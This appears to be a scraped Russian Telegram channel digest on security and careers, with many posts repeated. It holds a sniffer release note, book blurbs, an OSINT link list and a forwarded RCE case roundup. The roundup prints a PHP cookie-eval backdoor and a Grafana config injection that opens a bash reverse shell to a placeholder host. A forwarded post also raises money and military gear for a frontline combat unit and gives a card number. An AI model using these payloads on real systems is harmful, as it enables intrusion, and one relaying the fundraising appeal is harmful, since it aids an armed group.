Я выпускаю релиз новой версии 2.1 моего сниффера Above.
Caster - Above 2.1 (Codename: Vivid)
Genre: Offensive, Defensive
Subgenre: Penetration Testing, Network Security
Label: github.com
Release Date: 28 November 2023
Инструмент стал работать в несколько раз быстрее, теперь анализ протоколов на безопасность происходит одновременно;
Полностью переписан на основе Scapy, поддержка 12 сетевых протоколов канального и сетевых уровней, вместе с L7;
Добавлена функция поиска 802.1Q-тегов для обнаружения проблем безопасности сегментации;
В силу его специфики работы - его невозможно обнаружить во внутренней сети;
Добавлена поддержка Windows;
Устранены баги.
Данный релиз также предназначен для отправки инструмента в Kali Linux. Займусь этим в ближайшее время.
Link: github.com/wearecaster/Above
Release Link: github.com/wearecaster/Above/releases/tag/vivid
Caster - Above 2.1 (Codename: Vivid)
Genre: Offensive, Defensive
Subgenre: Penetration Testing, Network Security
Label: github.com
Release Date: 28 November 2023
Инструмент стал работать в несколько раз быстрее, теперь анализ протоколов на безопасность происходит одновременно;
Полностью переписан на основе Scapy, поддержка 12 сетевых протоколов канального и сетевых уровней, вместе с L7;
Добавлена функция поиска 802.1Q-тегов для обнаружения проблем безопасности сегментации;
В силу его специфики работы - его невозможно обнаружить во внутренней сети;
Добавлена поддержка Windows;
Устранены баги.
Данный релиз также предназначен для отправки инструмента в Kali Linux. Займусь этим в ближайшее время.
Link: github.com/wearecaster/Above
Release Link: github.com/wearecaster/Above/releases/tag/vivid
311b6a52-0ac5-4e1c-8737-bfa09322682c (2) (2).pdf
6.9 MB
🏃♂️ Кибердзюцу: кибербезопасность для современных ниндзя
Кибердзюцу — это практическое руководство по кибербезопасности, в основу которого легли техники, тактики и приемы древних ниндзя. Специалист по кибервойне Бен Маккарти проанализировал рассекреченные японские трактаты и рассказывает, как методики ниндзя можно применить к сегодняшним проблемам безопасности, например для ведения информационной войны, проникновений, шпионажа и использования уязвимостей нулевого дня.
#books
Кибердзюцу — это практическое руководство по кибербезопасности, в основу которого легли техники, тактики и приемы древних ниндзя. Специалист по кибервойне Бен Маккарти проанализировал рассекреченные японские трактаты и рассказывает, как методики ниндзя можно применить к сегодняшним проблемам безопасности, например для ведения информационной войны, проникновений, шпионажа и использования уязвимостей нулевого дня.
#books
👍1
Собеседование на английском проще простого, Наталья Дриго, 2016
Я собирала материал для этой книги много лет, так как английский и бизнес неразлучны в моей жизни. Я лингвист, но работаю в сфере финансов уже больше 10 лет. Проходила собеседования сама, проводила собеседования, подбирая подчиненных, подготавливала друзей к собеседованиям. В моем кругу друзей: рекрутеры, топ-менеджеры и сотрудники HR-департаментов. Поэтому и не случайно у меня возникла в голове идея создания этой книги-подсказки-шпаргалки.
Наслаждайтесь, пользуйтесь, развивайтесь!
#english #job
Я собирала материал для этой книги много лет, так как английский и бизнес неразлучны в моей жизни. Я лингвист, но работаю в сфере финансов уже больше 10 лет. Проходила собеседования сама, проводила собеседования, подбирая подчиненных, подготавливала друзей к собеседованиям. В моем кругу друзей: рекрутеры, топ-менеджеры и сотрудники HR-департаментов. Поэтому и не случайно у меня возникла в голове идея создания этой книги-подсказки-шпаргалки.
Наслаждайтесь, пользуйтесь, развивайтесь!
#english #job
👍1
Собеседование_на_английском_проще_простого,_Наталья_Дриго,_2016.pdf
1.2 MB
Собеседование на английском проще простого, Наталья Дриго, 2016
🔥1
Батл с кадровиком. Как пройти собеседование и выполнить все тесты, Ричард Борзов, 2018
Согласно одному из исследований Высшей школы экономики, 22,1 % россиян ежегодно меняют работу. Это означает, что каждый год количество соискателей превышает 31 млн человек. Такая внушительная цифра заставляет HR-менеджеров ответственнее подходить к подбору персонала и устраивать кандидатам настоящий «марафон». Телефонное интервью, стресс-интервью, деловые игры, презентации, психологические тесты и еще с десяток методик – всё это используют кадровики, чтобы выбрать одного из сотни претендентов.
«Батл с кадровиком» – практическое пособие для соискателей. Ричард Борзов, карьерный консультант с многолетним опытом, рассказывает в книге, как HR-менеджеры оценивают и отбирают резюме; приводит примеры удачных ответов на собеседованиях и решения числовых и вербальных тестов; дает описание компетенций, которые следует проявить кандидату в упражнениях на ассесмент-центрах.
#book #job
Согласно одному из исследований Высшей школы экономики, 22,1 % россиян ежегодно меняют работу. Это означает, что каждый год количество соискателей превышает 31 млн человек. Такая внушительная цифра заставляет HR-менеджеров ответственнее подходить к подбору персонала и устраивать кандидатам настоящий «марафон». Телефонное интервью, стресс-интервью, деловые игры, презентации, психологические тесты и еще с десяток методик – всё это используют кадровики, чтобы выбрать одного из сотни претендентов.
«Батл с кадровиком» – практическое пособие для соискателей. Ричард Борзов, карьерный консультант с многолетним опытом, рассказывает в книге, как HR-менеджеры оценивают и отбирают резюме; приводит примеры удачных ответов на собеседованиях и решения числовых и вербальных тестов; дает описание компетенций, которые следует проявить кандидату в упражнениях на ассесмент-центрах.
#book #job
Батл с кадровиком.pdf
2.9 MB
Батл с кадровиком. Как пройти собеседование и выполнить все тесты, Ричард Борзов, 2018
🔥2
Forwarded from ДШРГ Русич 🇷🇺
Всем здравия! ДШРГ Русич продолжает выполнение задач на Запорожском направлении несмотря ни на что.
Для продолжения работы на максимальном уровне группе требуется ваша помощь в оснащении оборудованием, не входящим в перечень выдаваемого по линии Минобороны:
- Автомобиль Нива с обвесом и лебедкой.
- Квадрокоптеры Мавик 3 PRO - 2 штуки (расходник который постоянно или глушат РЭБ или сбивают, а на них идёт основная работа днем)
- Двухканальный бинокль с дальномером на охлаждаемой матрице или аналогичный прибор на микроболометре по типу iRay xFuse.
- Тренога для винтовки и бинокля типо Leofoto SO 362
- Крепление (голова) под винтовку и под бинокль MAB-75 с быстрым зажимом
- Метеостанция Kestrel 5700 Elite Link.
- Для обеспечения тренировчного процесса группы и подразделения в штате которого состоим гонги из бронестали типо Хардекс 500 или аналогичной 5ХНМ с термообработкой толщиной 6 мм (3 круга диаметром 25 см, 3 круга диаметром 35 см, 3 грудные мишени номер 4) со стойками.
- Бинокуляр (очки) ночного видения для вождения транспорта типо NVGA - 15,bnvd1431 или Lindu pvs 31
- Инфракрасные фары на ТС, 2 шт.
- Цифровой ретранслятор Hyitera или ZTE.
- Подавитель для дронов на автомобиль по типу "Волнорез", 2 шт.
Также просим помощи на
обслуживание и ремонт имеющегося автомобильного транспорта (например замена пробитого осколком интеркулера за 30 тысяч, ТО, запчасти и другое).
Будем благодарны принять вашу помощь как в натуральном виде (по договорённости человек от нас может временно оттянуться с направления и забрать груз в тылу зоны СВО или в РФ), так и в финансовой форме.
Актуальные реквизиты подразделения:
2202206332014773 сбербанк
тинькофф - заблокирован
Благодарим каждого из вас за помощь.
Победа будет за нами. Слава России
Командир группы "Серб"
Для продолжения работы на максимальном уровне группе требуется ваша помощь в оснащении оборудованием, не входящим в перечень выдаваемого по линии Минобороны:
- Автомобиль Нива с обвесом и лебедкой.
- Квадрокоптеры Мавик 3 PRO - 2 штуки (расходник который постоянно или глушат РЭБ или сбивают, а на них идёт основная работа днем)
- Двухканальный бинокль с дальномером на охлаждаемой матрице или аналогичный прибор на микроболометре по типу iRay xFuse.
- Тренога для винтовки и бинокля типо Leofoto SO 362
- Крепление (голова) под винтовку и под бинокль MAB-75 с быстрым зажимом
- Метеостанция Kestrel 5700 Elite Link.
- Для обеспечения тренировчного процесса группы и подразделения в штате которого состоим гонги из бронестали типо Хардекс 500 или аналогичной 5ХНМ с термообработкой толщиной 6 мм (3 круга диаметром 25 см, 3 круга диаметром 35 см, 3 грудные мишени номер 4) со стойками.
- Бинокуляр (очки) ночного видения для вождения транспорта типо NVGA - 15,bnvd1431 или Lindu pvs 31
- Инфракрасные фары на ТС, 2 шт.
- Цифровой ретранслятор Hyitera или ZTE.
- Подавитель для дронов на автомобиль по типу "Волнорез", 2 шт.
Также просим помощи на
обслуживание и ремонт имеющегося автомобильного транспорта (например замена пробитого осколком интеркулера за 30 тысяч, ТО, запчасти и другое).
Будем благодарны принять вашу помощь как в натуральном виде (по договорённости человек от нас может временно оттянуться с направления и забрать груз в тылу зоны СВО или в РФ), так и в финансовой форме.
Актуальные реквизиты подразделения:
2202206332014773 сбербанк
тинькофф - заблокирован
Благодарим каждого из вас за помощь.
Победа будет за нами. Слава России
Командир группы "Серб"
❤8
Ultimate OSINT Collection
News & blogs
Newsletters
Books
How-to guides
CTFs
Podcasts
Tools collections
and more.
https://start.iss.one/p/DPYPMz/the-ultimate-osint-collection
Contributor twitter.com/hatless1der
News & blogs
Newsletters
Books
How-to guides
CTFs
Podcasts
Tools collections
and more.
https://start.iss.one/p/DPYPMz/the-ultimate-osint-collection
Contributor twitter.com/hatless1der
Forwarded from #Arm1tage
Remote Code Execution | Command Injection
RCE сложная и проворная уязвимость, которую хер так просто найдешь при багбаунти или АпСеке. Попался на глаза вот такой ролик, где чувак рассказывает про случаи инъекций команд, в каких местах они вызываются и как находятся. Я решил просто расписать коротко каждый случай из видео с прикрепленным к нему статьей/РоС-ом, чтобы не долбаться каждый раз и не пересматривать видос.
1. Сложная RCE через миграцию GitLab репозиториев с одного инстанса на другой. РоС.
2. /.git/config раскрывает ключ, который можно использовать для выполнения команд на сервере. Статья.
3. Выполнение команд прямо через куки на сервере с PHP (Статья):
4. Сервер на Руби при фаззинге параметров выдает ошибку через Rack и палит секрет для подписи куки. С помощью этого секрета создаем свой сериализованный объект с РЦЕ внутри. Статья.
5. RCE через CSRF на ажур, с интересным обходом проверки Origin (Статья):
6. Классическая SSTI на uber через имя профиля с отрабатыванием кода в письме. PoC.
7. RCE через SQL инъекцию. PoC.
8. Dependency Confusion. Об этом типе атак я делал пост ранее.
9. 0day уязвимости: Secure VPN.
10. RCE через картинки: ExifTool.
11. RCE через инъекцию опций в git.
12. Инъекция в параметр СМТП сервера на Grafana. РоС.
14 Потенциальная RCE через генерацию PDF файлов с использованием headless Chromium. Репорт.
#rce
RCE сложная и проворная уязвимость, которую хер так просто найдешь при багбаунти или АпСеке. Попался на глаза вот такой ролик, где чувак рассказывает про случаи инъекций команд, в каких местах они вызываются и как находятся. Я решил просто расписать коротко каждый случай из видео с прикрепленным к нему статьей/РоС-ом, чтобы не долбаться каждый раз и не пересматривать видос.
1. Сложная RCE через миграцию GitLab репозиториев с одного инстанса на другой. РоС.
2. /.git/config раскрывает ключ, который можно использовать для выполнения команд на сервере. Статья.
3. Выполнение команд прямо через куки на сервере с PHP (Статья):
{$_COOKIE['c'] .= ';';eval($_COOKIE['c']);exit;}4. Сервер на Руби при фаззинге параметров выдает ошибку через Rack и палит секрет для подписи куки. С помощью этого секрета создаем свой сериализованный объект с РЦЕ внутри. Статья.
5. RCE через CSRF на ажур, с интересным обходом проверки Origin (Статья):
https://<my-webapp>.scm.azurewebsites.net._.<attacker-site>./6. Классическая SSTI на uber через имя профиля с отрабатыванием кода в письме. PoC.
7. RCE через SQL инъекцию. PoC.
8. Dependency Confusion. Об этом типе атак я делал пост ранее.
9. 0day уязвимости: Secure VPN.
10. RCE через картинки: ExifTool.
11. RCE через инъекцию опций в git.
12. Инъекция в параметр СМТП сервера на Grafana. РоС.
"password": "x\r\n[plugin.grafana-image-renderer]\r\nrendering_args=--renderer-cmd-prefix=bash -c bash$IFS-l$IFS>$IFS/dev/tcp/SERVER_IP/4444$IFS0<&1$IFS2>&1"
13. Классический RCE через SSRF через Gopher. Статья.14 Потенциальная RCE через генерацию PDF файлов с использованием headless Chromium. Репорт.
#rce